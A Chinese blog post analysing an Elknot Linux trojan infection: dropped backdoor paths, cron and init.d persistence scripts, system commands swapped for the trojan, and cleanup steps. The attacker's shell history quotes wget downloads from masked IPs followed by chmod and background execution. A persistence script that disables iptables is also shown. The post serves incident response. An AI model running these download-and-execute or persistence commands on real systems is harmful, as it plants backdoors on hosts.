您的位置:首页 > 运维架构 > Linux

linux恶意样本-我是壮丁

2016-03-13 15:12 495 查看
今天看到drops,有白帽子发了一份服务器发现问题处理的一个过程主机被入侵分析过程报告

曾经也处理过类似的,应该是一个家族的,就发出来吧。

0x00:后门名称

Unix.Trojan.Elknot

0x01:后门行为

1.在 /mnt 目目录下放置多个后门程序,并运行行,主要程序有:conf.n、iptv、rc.loca3、rc.loca4 等

2.在 /tmp 目目录下放置多个后门程序,并运行行,主要程序有:Internet、2868等

3.在 /etc/cron.hourly/ 目录下放置后门脚本,同时添加启动任务到/etc/crontab 中,每半三分钟执行行一一次

/etc/crontab

*/3 * * * * root /etc/cron.hourly/udev.sh

cat /etc/cron.hourly/udev.sh

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

cp /lib/libgcc4.so /lib/libgcc4.4.so

/lib/libgcc4.4.so

4.添加多个服务,并设置开机启动,主要服务有:selinux、DbSecuritySpt等

(/etc/init.d/中会随机的生成一个启动脚本,需要人工识别)

[root@ init.d]# cat selinux

#!/bin/bash

/usr/bin/bsd-port/getty

[root@init.d]# cat DbSecuritySpt

#!/bin/bash

/root/Internet

随机的程序有时存在,有时不存在,需要人工识别

5.在 /usr/bin/bsd-port/ 放置后门程序 getty,并执行行

6.在 /usr/bin/dbus 目目录放置后门 dbus-daemon-draw,该脚本程序通过服务执行行

7.在 /usr/bin 目目录下放置 .ssh、bin2、newnode 程序并执行行

8.在 /usr/bin 目目录下放置 acpid、.zip.swp 后门程序

acpid部分shell脚本

service iptables stop 1>/dev/null 2>/dev/null

while true; do

if [ -x $binary ];then

sleep 1

else

if [ -x /usr/bin/.zip.swp ];then

echo y|cp /usr/bin/.zip.swp $binary 2>/dev/null

chmod a+x $binary

else

echo y|cp /usr/share/man/man3/ast.gz $binary 2>/dev/null

chmod a+x $binary

fimv ast

fi

"acpid" 36L, 572C

9.在 /usr/share/man/man3 放置 ast.gz 后门程序

10.替换 ps、netstat、lsof、ss 四个系统命令为后门程序

(被替换的命令存放在/usr/bin/dpkgd)

其中所有后门程序的MD5值相同(包含被替换的命令)

[root@www ~]# md5sum Internet

76aa5297ed2d046d3e618f0228aaf0a9  Internet

[root@www ~]# md5sum /bin/ps

76aa5297ed2d046d3e618f0228aaf0a9  /bin/ps

[root@www ~]# md5sum /usr/bin/.sshd

76aa5297ed2d046d3e618f0228aaf0a9  /usr/bin/.sshd

11.后门运行后会在/tmp目录下产生以下文件

gates.lod,moni.lod等文件

0x02:种植后门的操作(history)

968   w

969   ifconfig

970   ethtool eth0

971   cd /mnt

972  wget http://1x.x29.x32.1x0:10089/Systenm 
973   chmod +x Systenm

974    ./Systenm &

975   w

976   last

977  wget http://18x.13x.21x.20x:8050/rc.loca3 
978   chmod 0755 /mnt/rc.loca3

979   nohup /mnt/rc.loca3 > /dev/null 2>&1 &

980   w

981   04:48:18 exit

982   cd /tmp

983   chmod +x Internet

984   ./Internet &

985   chmod +x 2868

986   ./2868 &

0x03:后门清除&&后续处理

1.删除crontab里面的内容

2.还原系统替换的命令

3.Kill已经在运行的进程

4.删除启动项中的脚本(/etc/init.d/和/etc/rc*.d里面的东西)

5.清除/tmp,/mnt,/usr/bin/等目录中的文件

6.备份数据后重装系统

7.排查其他机器


样本应该存留了,等我找到放到哪里了再发出来。。。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航